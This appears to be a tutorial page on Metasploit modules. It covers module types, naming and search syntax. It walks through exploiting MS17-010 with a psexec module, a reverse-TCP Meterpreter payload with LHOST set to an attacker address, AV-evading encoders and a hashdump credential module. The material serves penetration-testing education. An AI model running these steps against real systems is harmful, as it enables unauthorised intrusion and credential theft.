Working with Metasploit Modules

Overview of Metasploit Modules

Metasploit's modules are pre-built scripts designed for specific tasks such as vulnerability scanning, exploitation, post-exploitation, and evasion. They are a cornerstone of the framework, enabling penetration testers to streamline their workflows and automate tasks.

Purpose of Modules:

Automate repetitive processes.
Enhance manual testing by providing reusable functionality.
Organize tools and exploits into categorized scripts.

Types of Metasploit Modules

Auxiliary Modules:
- Non-exploit modules for scanning, fuzzing, sniffing, and information gathering.
- Example:
  auxiliary/scanner/smb/smb_version
Encoders:
- Modify payloads to bypass detection mechanisms like antivirus (AV).
- Example:
  x86/shikata_ga_nai
Exploits:
- Exploit vulnerabilities in systems or applications.
- Example:
  exploit/windows/smb/ms17_010_eternalblue
NOPs (No-Operation):
- Maintain payload stability by filling memory with NOP instructions.
- Example:
  generic/nop
Payloads:
- Code delivered to the target, often used to establish remote access.
- Example:
  windows/meterpreter/reverse_tcp
Post-Exploitation Modules:
- Perform tasks after gaining access, such as lateral movement or data extraction.
- Example:
  post/windows/gather/hashdump
Plugins:
- Extend Metasploit's functionality with additional features.
- Example:
  openvas

Module Structure

Modules are organized hierarchically based on their type, target OS, service, and functionality.

General Format:

<type>/<os>/<service>/<module_name>

Example:

exploit/windows/http/iis_webdav_scstoragepathfromurl

Components Explained:

Type: Module category (e.g., exploit, auxiliary).
Operating System: Target OS (e.g., windows, linux).
Service: Vulnerable application or protocol (e.g., http, smb).
Name: Descriptive identifier of the module.

Searching for Modules

Use the search command to locate modules based on specific criteria.

Syntax:

search [<options>] [<keywords>:<value>]

Examples:

Search for modules related to MS17-010:
```
search ms17_010
```
Filter by CVE ID:
```
search cve:2009 type:exploit
```
Exclude specific platforms (e.g., Linux):
```
search platform:-linux
```

Search Options:

Option

Description

-h

Displays help for the search command.

-o <file>

Saves search results to a file.

-S <regex>

Applies a regex filter to results.

-s <column>

Sorts results by a specific column.

-r

Reverses the sort order.

Using Modules: Practical Example

Scenario: Exploiting MS17-010 using the EternalRomance module.

Search for the Exploit:
```
msf6 > search ms17_010
```

Select the Module:

msf6 > use exploit/windows/smb/ms17_010_psexec

View Module Information:
```
msf6 exploit(ms17_010_psexec) > info
```

Configure Options:

msf6 exploit(ms17_010_psexec) > options
msf6 exploit(ms17_010_psexec) > set RHOSTS <target_IP>
msf6 exploit(ms17_010_psexec) > set LHOST <attacker_IP>

Execute the Exploit:
```
msf6 exploit(ms17_010_psexec) > run
```
Post-Exploitation:
- After gaining access, use payload commands (e.g., Meterpreter) to perform further actions such as privilege escalation or credential harvesting.

Command Cheatsheet

Command

Description

search <keyword>

Locate modules matching the keyword.

use <module_path>

Load a module into the console.

info

Display detailed information about a module.

show options

List configurable parameters for a module.

set <option> <value>

Configure a specific option.

run or exploit

Execute the module.

show payloads

View payloads compatible with the module.

show targets

List targets supported by the module.

PreviousMetasploit NextTargets and Payloads

hashtagOverview of Metasploit Modules

hashtagTypes of Metasploit Modules

hashtagModule Structure

hashtagSearching for Modules

hashtagUsing Modules: Practical Example